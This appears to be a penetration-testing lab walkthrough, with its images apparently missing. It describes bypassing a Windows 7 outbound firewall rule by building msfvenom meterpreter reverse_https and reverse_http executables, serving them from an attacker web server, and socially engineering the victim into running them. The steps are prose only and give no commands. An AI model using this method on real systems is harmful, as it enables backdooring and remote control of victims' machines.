WINDOWS 7 - REVERSE SHELL HTTPS / HTTP
- Layout to this exercise:
- In the previous exercise an OUTBOUND rule was created with Windows Advanced Firewall for Security for blocking reverse shell connections to remote port TCP 4444, used by default by Metasploit:
- However, this rule would not block OUTBOUND connections to any other remote port, for instance port 443 (HTTPS) or port 80 (HTTP).
- On next
two exercises, let's see how it is possible to install backdoors on
the victim machine, bypassing firewalls, using Social Engineering so
that the victim downloads executables files from the attacker's wep
page.
REVERSE_HTTPS.exe
- Let's
create the executable reverse_https.exe, using msfvenom and
meterpreter reverse_https payload:
- Checking
that it is an executable file for Windows:
- The attacker opens a web server on port 8000:
- Also, the attacker Kali sets up a handler exploit with local port 443 (HTTPS) and local IP, waiting for the victim:
- Then, the victim Windows 7 connects to the web server, downloads and runs the executable reverse_https.exe:
- Automatically, a meterpreter session is open on the attacker's console, and the post exploitation process can be started:
REVERSE_HTTP.exe
- Same
goal could be achieved with HTTP protocol. The
attacker creates the binary reverse_http.exe with msfvenom. In
this case the LPORT corresponds to 80 (HTTP), and local IP
corresponds to the attacker's machine:
- The file is executable on Microsoft systems:
- A web server is set up by the attacker:
- Also, a
handler exploit waits until the clients connects and runs the binary:
- The
victim Windows 7 downloads and runs reverse_http.exe:
- Automatically,
a meterpreter session is achieved on the attacker's machine:
